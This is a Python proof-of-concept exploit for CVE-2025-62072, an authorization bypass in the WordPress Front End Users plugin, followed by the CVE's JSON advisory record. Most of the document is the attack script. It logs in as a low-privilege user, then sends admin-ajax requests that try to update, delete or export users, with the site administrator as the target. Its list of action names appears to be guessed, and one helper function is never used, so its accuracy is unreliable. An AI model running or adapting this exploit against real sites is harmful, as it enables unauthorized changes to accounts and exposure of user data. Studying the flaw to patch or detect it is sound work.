CVE-2025-62072

# CVE-2025-62072 PoC - WordPress Front End Users Authorization Bypass # Affected Plugin: front-end-only-users <= 3.2.33 import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def get_wp_nonce(url, target_action): """Extract WordPress nonce from page""" session = requests.Session() response = session.get(url) if response.status_code == 200: # Extract nonce from page content import re nonce_match = re.search(r'name="_wpnonce" value="([a-z0-9]+)"', response.text) if nonce_match: return nonce_match.group(1) return None def exploit_authorization_bypass(): """Exploit the missing authorization vulnerability""" session = requests.Session() # Step 1: Login as low-privilege user login_url = f"{TARGET_URL}/wp-login.php" login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": TARGET_URL, "testcookie": "1" } login_response = session.post(login_url, data=login_data) if "wordpress_logged_in" not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful as low-privilege user") # Step 2: Exploit the authorization bypass # Target the plugin's AJAX endpoint with missing authorization check exploit_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Common vulnerable actions in front-end-only-users plugin vulnerable_actions = [ "feu_update_user", "feu_delete_user", "feu_get_users", "feu_export_users", "feu_manage_user_levels" ] for action in vulnerable_actions: exploit_data = { "action": action, "user_id": "1", # Target admin user "_wpnonce": " bypassed " # Nonce check is missing } response = session.post(exploit_url, data=exploit_data) if response.status_code == 200 and "success" in response.text.lower(): print(f"[+] Successfully exploited action: {action}") print(f"[+] Response: {response.text[:200]}") return True if __name__ == "__main__": print("[*] CVE-2025-62072 Exploitation Tool") print("[*] Target: WordPress with front-end-only-users <= 3.2.33") exploit_authorization_bypass()

{"cve": {"id": "CVE-2025-62072", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:06.100", "lastModified": "2026-04-27T17:16:31.490", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Rustaurius Front End Users front-end-only-users.This issue affects Front End Users: from n/a through <= 3.2.33."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/front-end-only-users/vulnerability/wordpress-front-end-users-plugin-3-2-33-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}